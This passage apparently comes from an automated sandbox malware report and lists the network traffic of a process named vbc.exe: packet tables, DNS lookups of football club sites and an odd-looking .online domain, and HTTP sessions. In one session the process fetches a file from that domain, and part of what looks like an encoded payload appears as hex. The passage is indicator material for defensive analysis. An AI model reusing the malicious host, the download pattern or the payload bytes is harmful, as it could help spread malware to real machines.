Mar 2, 2021 20:23:40.073247910 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.073297977 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.073369026 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.073585033 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.073628902 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.073698997 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.074913979 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.075048923 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.075134039 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.076176882 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.076220989 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.076383114 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.080677032 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.080725908 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.080857992 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.082271099 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.082314968 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.082417965 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.083534956 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.083579063 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.083659887 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.083842993 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.083887100 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.083942890 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.084739923 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.084784031 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.084851980 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.088160992 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.088207006 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.088246107 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.088288069 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.088551044 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.088624954 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.089003086 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.089052916 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.089087963 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.089205980 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.089745045 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.089785099 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.089847088 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.089850903 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.090686083 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.090729952 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.090771914 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.090773106 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.090828896 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.091571093 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.091610909 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.091650009 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.091667891 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.092502117 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.092541933 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.092581034 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.092593908 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.092631102 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.093426943 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.093461037 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.093534946 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:25:03.384673119 CET	49181	80	192.168.2.22	23.227.38.74
Mar 2, 2021 20:25:03.425621033 CET	80	49181	23.227.38.74	192.168.2.22
Mar 2, 2021 20:25:03.425815105 CET	49181	80	192.168.2.22	23.227.38.74
Mar 2, 2021 20:25:03.425981998 CET	49181	80	192.168.2.22	23.227.38.74
Mar 2, 2021 20:25:03.464066982 CET	80	49181	23.227.38.74	192.168.2.22
Mar 2, 2021 20:25:03.644177914 CET	80	49181	23.227.38.74	192.168.2.22
Mar 2, 2021 20:25:03.644206047 CET	80	49181	23.227.38.74	192.168.2.22
Mar 2, 2021 20:25:03.644227982 CET	80	49181	23.227.38.74	192.168.2.22
Mar 2, 2021 20:25:03.644249916 CET	80	49181	23.227.38.74	192.168.2.22
Mar 2, 2021 20:25:03.644265890 CET	80	49181	23.227.38.74	192.168.2.22
Mar 2, 2021 20:25:03.644283056 CET	80	49181	23.227.38.74	192.168.2.22
Mar 2, 2021 20:25:03.644397020 CET	80	49181	23.227.38.74	192.168.2.22
Mar 2, 2021 20:25:03.644427061 CET	49181	80	192.168.2.22	23.227.38.74
Mar 2, 2021 20:25:03.644460917 CET	49181	80	192.168.2.22	23.227.38.74
Mar 2, 2021 20:25:03.644563913 CET	49181	80	192.168.2.22	23.227.38.74

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 2, 2021 20:23:27.160479069 CET	52197	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:27.299413919 CET	53	52197	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:28.175293922 CET	53099	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:28.224049091 CET	53	53099	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:28.227973938 CET	52838	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:28.292423964 CET	53	52838	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:31.378891945 CET	61200	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:31.424714088 CET	53	61200	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:31.437637091 CET	49548	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:31.494760036 CET	53	49548	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:32.665916920 CET	55627	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:32.728029966 CET	53	55627	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:32.742088079 CET	56009	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:32.799299002 CET	53	56009	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:32.992675066 CET	61865	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:33.058386087 CET	53	61865	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:33.070552111 CET	55171	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:33.126617908 CET	53	55171	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:33.586050034 CET	52496	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:33.650012016 CET	53	52496	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:33.662411928 CET	57564	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:33.718213081 CET	53	57564	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:33.830627918 CET	63009	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:33.885145903 CET	53	63009	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:33.899144888 CET	59319	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:33.958595037 CET	53	59319	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:37.571651936 CET	53070	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:37.617782116 CET	53	53070	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:37.647604942 CET	59770	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:37.707295895 CET	53	59770	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:37.816029072 CET	61523	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:37.874608994 CET	53	61523	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:37.886791945 CET	62791	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:37.943860054 CET	53	62791	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:38.053100109 CET	50667	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:38.110711098 CET	53	50667	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:38.948757887 CET	54129	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:39.008884907 CET	53	54129	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:39.034163952 CET	65329	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:39.091425896 CET	53	65329	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:39.208683014 CET	60718	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:39.276216984 CET	53	60718	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:39.298028946 CET	49157	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:39.346506119 CET	53	49157	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:40.104099035 CET	57391	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:40.176274061 CET	53	57391	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:40.191926003 CET	61858	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:40.249979973 CET	53	61858	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:40.350177050 CET	62500	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:40.405117035 CET	53	62500	8.8.8.8	192.168.2.22
Mar 2, 2021 20:23:40.425496101 CET	51652	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:23:40.480176926 CET	53	51652	8.8.8.8	192.168.2.22
Mar 2, 2021 20:25:03.209738016 CET	62762	53	192.168.2.22	8.8.8.8
Mar 2, 2021 20:25:03.348289967 CET	53	62762	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 2, 2021 20:23:27.160479069 CET	192.168.2.22	8.8.8.8	0xef9e	Standard query (0)	carnesymas-restaurante.renova-sa.net	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:32.665916920 CET	192.168.2.22	8.8.8.8	0x9f48	Standard query (0)	www.chelseafc.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:32.742088079 CET	192.168.2.22	8.8.8.8	0x1a0d	Standard query (0)	www.chelseafc.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:32.992675066 CET	192.168.2.22	8.8.8.8	0x76f5	Standard query (0)	www.chelseafc.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.070552111 CET	192.168.2.22	8.8.8.8	0xce5a	Standard query (0)	www.chelseafc.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.586050034 CET	192.168.2.22	8.8.8.8	0x545d	Standard query (0)	www.manutd.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.662411928 CET	192.168.2.22	8.8.8.8	0xb9fb	Standard query (0)	www.manutd.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.830627918 CET	192.168.2.22	8.8.8.8	0x7e42	Standard query (0)	www.manutd.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.899144888 CET	192.168.2.22	8.8.8.8	0x819c	Standard query (0)	www.manutd.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:37.571651936 CET	192.168.2.22	8.8.8.8	0x3d67	Standard query (0)	www.mancity.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:37.647604942 CET	192.168.2.22	8.8.8.8	0xfa4f	Standard query (0)	www.mancity.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:37.816029072 CET	192.168.2.22	8.8.8.8	0x98d	Standard query (0)	www.mancity.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:37.886791945 CET	192.168.2.22	8.8.8.8	0x8388	Standard query (0)	www.mancity.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:38.053100109 CET	192.168.2.22	8.8.8.8	0xc97e	Standard query (0)	0k10dk21kkeok2e.online	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:38.948757887 CET	192.168.2.22	8.8.8.8	0xcb83	Standard query (0)	www.liverpoolfc.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.034163952 CET	192.168.2.22	8.8.8.8	0x5d7	Standard query (0)	www.liverpoolfc.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.208683014 CET	192.168.2.22	8.8.8.8	0x585b	Standard query (0)	www.liverpoolfc.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.298028946 CET	192.168.2.22	8.8.8.8	0xed1a	Standard query (0)	www.liverpoolfc.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:40.104099035 CET	192.168.2.22	8.8.8.8	0xfab0	Standard query (0)	www.realmadrid.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:40.191926003 CET	192.168.2.22	8.8.8.8	0x45ce	Standard query (0)	www.realmadrid.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:40.350177050 CET	192.168.2.22	8.8.8.8	0x69e2	Standard query (0)	www.realmadrid.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:40.425496101 CET	192.168.2.22	8.8.8.8	0x7b70	Standard query (0)	www.realmadrid.com	A (IP address)	IN (0x0001)
Mar 2, 2021 20:25:03.209738016 CET	192.168.2.22	8.8.8.8	0xccff	Standard query (0)	www.ofetons.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 2, 2021 20:23:27.299413919 CET	8.8.8.8	192.168.2.22	0xef9e	No error (0)	carnesymas-restaurante.renova-sa.net		97.107.138.110	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:32.728029966 CET	8.8.8.8	192.168.2.22	0x9f48	No error (0)	www.chelseafc.com	chelseafc.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:32.728029966 CET	8.8.8.8	192.168.2.22	0x9f48	No error (0)	chelseafc.map.fastly.net		151.101.2.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:32.728029966 CET	8.8.8.8	192.168.2.22	0x9f48	No error (0)	chelseafc.map.fastly.net		151.101.66.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:32.728029966 CET	8.8.8.8	192.168.2.22	0x9f48	No error (0)	chelseafc.map.fastly.net		151.101.130.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:32.728029966 CET	8.8.8.8	192.168.2.22	0x9f48	No error (0)	chelseafc.map.fastly.net		151.101.194.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:32.799299002 CET	8.8.8.8	192.168.2.22	0x1a0d	No error (0)	www.chelseafc.com	chelseafc.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:32.799299002 CET	8.8.8.8	192.168.2.22	0x1a0d	No error (0)	chelseafc.map.fastly.net		151.101.2.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:32.799299002 CET	8.8.8.8	192.168.2.22	0x1a0d	No error (0)	chelseafc.map.fastly.net		151.101.66.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:32.799299002 CET	8.8.8.8	192.168.2.22	0x1a0d	No error (0)	chelseafc.map.fastly.net		151.101.130.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:32.799299002 CET	8.8.8.8	192.168.2.22	0x1a0d	No error (0)	chelseafc.map.fastly.net		151.101.194.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.058386087 CET	8.8.8.8	192.168.2.22	0x76f5	No error (0)	www.chelseafc.com	chelseafc.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:33.058386087 CET	8.8.8.8	192.168.2.22	0x76f5	No error (0)	chelseafc.map.fastly.net		151.101.2.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.058386087 CET	8.8.8.8	192.168.2.22	0x76f5	No error (0)	chelseafc.map.fastly.net		151.101.66.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.058386087 CET	8.8.8.8	192.168.2.22	0x76f5	No error (0)	chelseafc.map.fastly.net		151.101.130.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.058386087 CET	8.8.8.8	192.168.2.22	0x76f5	No error (0)	chelseafc.map.fastly.net		151.101.194.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.126617908 CET	8.8.8.8	192.168.2.22	0xce5a	No error (0)	www.chelseafc.com	chelseafc.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:33.126617908 CET	8.8.8.8	192.168.2.22	0xce5a	No error (0)	chelseafc.map.fastly.net		151.101.2.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.126617908 CET	8.8.8.8	192.168.2.22	0xce5a	No error (0)	chelseafc.map.fastly.net		151.101.66.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.126617908 CET	8.8.8.8	192.168.2.22	0xce5a	No error (0)	chelseafc.map.fastly.net		151.101.130.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.126617908 CET	8.8.8.8	192.168.2.22	0xce5a	No error (0)	chelseafc.map.fastly.net		151.101.194.133	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:33.650012016 CET	8.8.8.8	192.168.2.22	0x545d	No error (0)	www.manutd.com	www.manutd.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:33.718213081 CET	8.8.8.8	192.168.2.22	0xb9fb	No error (0)	www.manutd.com	www.manutd.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:33.885145903 CET	8.8.8.8	192.168.2.22	0x7e42	No error (0)	www.manutd.com	www.manutd.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:33.958595037 CET	8.8.8.8	192.168.2.22	0x819c	No error (0)	www.manutd.com	www.manutd.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:37.617782116 CET	8.8.8.8	192.168.2.22	0x3d67	No error (0)	www.mancity.com	www.mancity.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:37.707295895 CET	8.8.8.8	192.168.2.22	0xfa4f	No error (0)	www.mancity.com	www.mancity.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:37.874608994 CET	8.8.8.8	192.168.2.22	0x98d	No error (0)	www.mancity.com	www.mancity.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:37.943860054 CET	8.8.8.8	192.168.2.22	0x8388	No error (0)	www.mancity.com	www.mancity.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:38.110711098 CET	8.8.8.8	192.168.2.22	0xc97e	No error (0)	0k10dk21kkeok2e.online		104.21.59.148	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:38.110711098 CET	8.8.8.8	192.168.2.22	0xc97e	No error (0)	0k10dk21kkeok2e.online		172.67.179.188	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.008884907 CET	8.8.8.8	192.168.2.22	0xcb83	No error (0)	www.liverpoolfc.com	d2hhwit6pbhmvu.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:39.008884907 CET	8.8.8.8	192.168.2.22	0xcb83	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.34	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.008884907 CET	8.8.8.8	192.168.2.22	0xcb83	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.29	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.008884907 CET	8.8.8.8	192.168.2.22	0xcb83	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.58	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.008884907 CET	8.8.8.8	192.168.2.22	0xcb83	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.103	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.091425896 CET	8.8.8.8	192.168.2.22	0x5d7	No error (0)	www.liverpoolfc.com	d2hhwit6pbhmvu.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:39.091425896 CET	8.8.8.8	192.168.2.22	0x5d7	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.34	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.091425896 CET	8.8.8.8	192.168.2.22	0x5d7	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.29	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.091425896 CET	8.8.8.8	192.168.2.22	0x5d7	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.58	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.091425896 CET	8.8.8.8	192.168.2.22	0x5d7	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.103	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.276216984 CET	8.8.8.8	192.168.2.22	0x585b	No error (0)	www.liverpoolfc.com	d2hhwit6pbhmvu.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:39.276216984 CET	8.8.8.8	192.168.2.22	0x585b	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.103	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.276216984 CET	8.8.8.8	192.168.2.22	0x585b	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.29	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.276216984 CET	8.8.8.8	192.168.2.22	0x585b	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.58	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.276216984 CET	8.8.8.8	192.168.2.22	0x585b	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.34	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.346506119 CET	8.8.8.8	192.168.2.22	0xed1a	No error (0)	www.liverpoolfc.com	d2hhwit6pbhmvu.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:39.346506119 CET	8.8.8.8	192.168.2.22	0xed1a	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.34	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.346506119 CET	8.8.8.8	192.168.2.22	0xed1a	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.29	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.346506119 CET	8.8.8.8	192.168.2.22	0xed1a	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.58	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:39.346506119 CET	8.8.8.8	192.168.2.22	0xed1a	No error (0)	d2hhwit6pbhmvu.cloudfront.net		99.86.159.103	A (IP address)	IN (0x0001)
Mar 2, 2021 20:23:40.176274061 CET	8.8.8.8	192.168.2.22	0xfab0	No error (0)	www.realmadrid.com	realmadrid.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:40.249979973 CET	8.8.8.8	192.168.2.22	0x45ce	No error (0)	www.realmadrid.com	realmadrid.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:40.405117035 CET	8.8.8.8	192.168.2.22	0x69e2	No error (0)	www.realmadrid.com	realmadrid.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:23:40.480176926 CET	8.8.8.8	192.168.2.22	0x7b70	No error (0)	www.realmadrid.com	realmadrid.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:25:03.348289967 CET	8.8.8.8	192.168.2.22	0xccff	No error (0)	www.ofetons.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Mar 2, 2021 20:25:03.348289967 CET	8.8.8.8	192.168.2.22	0xccff	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.chelseafc.com

0k10dk21kkeok2e.online

www.liverpoolfc.com

www.ofetons.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49170	151.101.2.133	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2021 20:23:32.936647892 CET	208	OUT	GET / HTTP/1.1 User-Agent: Other Host: www.chelseafc.com Connection: Keep-Alive
Mar 2, 2021 20:23:32.977423906 CET	208	IN	HTTP/1.1 302 Found Retry-After: 0 Content-Length: 0 Location: https://www.chelseafc.com/en Accept-Ranges: bytes Date: Tue, 02 Mar 2021 19:23:32 GMT Connection: close Vary: Accept-Encoding, Accept-Language Access-Control-Allow-Origin: * X-Powered-By: Curiosity X-Geo-Country_code: CH

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49176	104.21.59.148	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2021 20:23:38.154921055 CET	833	OUT	GET /base/80715A1271D5E2B9CFA3628555538742.html HTTP/1.1 User-Agent: Other Host: 0k10dk21kkeok2e.online Connection: Keep-Alive
Mar 2, 2021 20:23:38.380904913 CET	835	IN	HTTP/1.1 200 OK Date: Tue, 02 Mar 2021 19:23:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d665f91d90f85d26cedc717e2766333681614713018; expires=Thu, 01-Apr-21 19:23:38 GMT; path=/; domain=.0k10dk21kkeok2e.online; HttpOnly; SameSite=Lax Last-Modified: Tue, 02 Mar 2021 08:21:08 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 0895fe6f4b000063bfa1ad7000000001 Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=6bMFnBCMR%2F2sc0P318R%2BaAEl6R3KtMqcaEuoZKRb8muHkBre%2BlqlFM%2FJqVK0hENndC2wfbF9YbAJmMf6nrJJNXREFoswYeoJvyLRGfiFoEoKEQxyjVMv"}],"max_age":604800} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 629d002baa5863bf-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 37 63 38 30 0d 0a 3c 70 3e 71 71 66 63 49 66 6c 62 62 66 49 66 46 66 49 66 49 66 49 66 62 66 49 66 49 66 49 66 4e 43 43 66 4e 43 43 66 49 66 49 66 6c 68 62 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 53 62 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 6c 4e 68 66 49 66 49 66 49 66 6c 62 66 46 6c 66 6c 68 53 66 6c 62 66 49 66 6c 68 49 66 63 66 4e 49 43 66 46 46 66 6c 68 62 66 6c 66 71 53 66 4e 49 43 66 46 46 66 68 62 66 6c 49 62 66 6c 49 43 66 6c 6c 43 66 46 4e 66 6c 6c 4e 66 6c 6c 62 66 6c 6c 6c 66 6c 49 46 66 6c 6c 62 66 63 71 66 6c 49 63 66 46 4e 66 63 63 66 63 71 66 6c 6c 49 66 6c 6c 49 66 6c 6c 6c 66 6c 6c 53 66 46 4e 66 63 68 66 6c 49 6c 66 46 4e 66 6c 6c 62 66 6c 6c 71 66 6c 6c 49 66 46 4e 66 6c 49 43 66 6c 6c 49 66 46 4e 66 53 68 66 71 63 66 68 46 66 46 4e 66 6c 49 63 66 6c 6c 6c 66 6c 49 49 66 6c 49 6c 66 62 53 66 6c 46 66 6c 46 66 6c 49 66 46 53 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 68 49 66 53 63 66 49 66 49 66 71 53 66 6c 66 46 66 49 66 71 53 66 6c 62 4e 66 62 6c 66 6c 68 49 66 49 66 49 66 49 66 